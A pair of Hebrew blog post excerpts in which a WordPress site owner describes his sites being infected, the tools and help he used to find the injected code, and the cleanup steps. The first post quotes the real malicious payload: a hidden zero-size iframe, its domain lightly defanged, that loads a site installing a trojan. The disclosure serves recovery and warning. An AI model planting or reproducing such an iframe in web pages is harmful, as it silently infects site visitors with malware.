אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH

http://weblogtoolscollection.com/archives/2009/06/15/security-and-anti-spam-plugins-for-wordpress/(זהירות: פוטס טכני לחובבי הוורדפרס מבינינו)

אז לאחר שגיליתי שהבלוג שלי נדבק בווירוס, יצאתי לחפש אחר פתרון ובפוסט זה אני מביע תודה לכל אלו שעזרו ומקווה לסייע לאחרים בעתיד שיתקלו בבעיות דומות.

הבעיה הייתה שאיכשהו (כנראה פריצה לאחד היוזרים של ה- FTP של השרת שלי) איזשהו בוט נכנס לשרת והכניס לקבצים שבשרת שורת קוד שטוענת אתר (iframe) בתוך כל אחד מהאתרים שלי, האתר הזה מתקין איזשהו סוס טרויאני (לא ברור איזה), וזיהם את רוב (אם לא כל) הקבצים שעל השרת.

הקוד הזדוני נראה כך (הדרך שבה הדבקתי אותו אמורה לסרס את פעולת הקוד, אבל לא הייתי ממליץ להכנס ללינק ללא אנטיווירוס מותקן):

<iframe src="http:// m-analytics . net /qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

כיצד מצאתי את הפתרון:

  1. פניתי לחברי בפייסבוק, טוויטר, קבוצת העזרה של וורדפרס העולמית וקבוצת הדיון של וורדפרס בעברית לבקש עזרה. אף אחד לא נתן את הפתרון המדויק, אבל שילוב של הפתרונות הביא לסיום הפרשה. אני רוצה להודות לדותן מזור ואיתן ברקט (ששילוב הטיפים שלהם הוא שפתר לי את רוב התעלומה – ראו סעיף 5), לצפריר ריהן (שנתן טיפים כלליים טובים),  לתומר כהן, לאלעד (על הרצון הטוב), ניצן בן-נון (שנתן כיוונים מעולים והפתרון שלו כמעט עבד, אבל לא הצלחתי ליישם אותו כלשונו), לדוד גור ולאריק וגליה (שרצו לעזור, אבל לא הספיקו לעזור לפני האחרים).  (דוד, ניצן וגליה – איני יודע מה הלינקים לבלוגים שלכם, תשלחו ותקבלו)
  2. כדי לוודא בכל שלב של הניסוי האם אני מצליח או לא, השתמשתי באתר "הסר מסכות טפילים" שמגלה האם יש באתר כלשהו עדות ללינקים חבויים או דברים שמעלים חשד של פריצה לאתר.
  3. התקנתי על הוורדפרס את התוסף WordPress Exploit Scanner אליו הגעתי דרך הפוסט Security And Anti-spam Plugins For WordPress – זהו תוסף שמאפשר לגלות קבצים "מזוהמים" בוורדפרס. מה שאיפשר לי לזהות איפה נמצאו הלינקים שיש להוריד.
  4. מצאתי באינטרנט מישהו אחר שנתן הוראות (שלא בדיוק עבדו) לפתרון בעיה דומה של החדרת קוד זדוני של iframe, http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/ שם קיבלתי אישור שהכיוון הכללי הוא הנכון.
  5. קיבלתי הפניה לאתר (המצויין) http://www.commandlinefu.com שאפשר בתוכו למצוא אוצרות בלומים של איך לעשות מה עם פקודות ב- SSH (שזה בדיוק מה שנזדקקתי לו) (את זה שלח לי דותן, ובשילוב עם העזרה הכללית בקוד הרג'אקס דרך איתן – הבעיה נפטרה)

מהו הפתרון

להמשיך לקרוא אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH

הבלוג שלי נדבק בווירוס (בידקו את המחשבים שלכם!)

קוראים יקרים שלום.
נודע לי היום שהאתר שלי (ועוד אתרים אחרים באחסון שלי), נחשפו לפריצה אשר החדירה קוד זדוני שמתקין ווירוס אצל גולשים המבקרים באתר.
לאלו מכם שיש אנטיווירוס מותקן ומעודכן על המחשב, תגלו שהוא חוסם את הווירוס בכניסתכם לאתר.
לאלו מכם שאין אנטיווירוס (נו נו נו לכם!), אל תלכו, תרוצו, להתקין אנטי ווירוס (כבר למעלה משנתיים אני משתמש מרוצה  של AVAST, הדרך הקלה להוריד אותו היא מהלינק כאן)

לאנשי הוורדפרס מבינינו, הנה איך שגיליתי (ואיך שאני מתכנן) לפתור את הבעיה:
1) הגילוי – חברים עדכנו אותי (במייל ודרך טוויטר) שהאנטיווירוס שלהם מתלונן בכניסתו לאתר.
2) החקירה – לאחרונה פורסם פוסט בנושא פלאגיני אבטחה לוורדפרס (הנה הלינק) בבלוג לו אני מנוי. לאחר סקירה זריזה שלו החלטתי להתקין את הפלאגין WordPress Exploit Scanner והרצתי אותו לסרוק ולמצוא חריגות. הוא הצליח לאתר קוד זדוני שמושתל בקבצים ראשיים באתר שלי (קמצי ה- index וכן הלאה).
3) הפניה לעזרה – פניתי לשירות האחסון שלי (site5) בבקשה מהם לשחזר גיבוי קודם לקבצים ומחיקת כל משתמשי ה- FTP שלי. הם צפויים לעשות זאת בשעות הקרובות ואז אראה אם זה הספיק (אם לא, אני אצטרך לעבור ולמחוק את כל הלינקים שהושתלו בקבצי האתר. ואז אני אצטרך לחפש דרך לבצע search and replace המוני על האתר מבלי להוריד אלי את כל הקבצים מהשרת ואז להעלות אותם – הידד…)
4) הפתרון – עוד לא בוצע. כשיהיה, יהיה…. (ואני אעדכן אותו כאן)

ולסיום, שירות התמיכה של site5 שלחו לי שורה של "המלצות חמות" על מה כדאי שאבצע כדי להבטיח שלא יפרצו לאתר שלי, אני מצרף אותם כאן להנאתכם
להמשיך לקרוא הבלוג שלי נדבק בווירוס (בידקו את המחשבים שלכם!)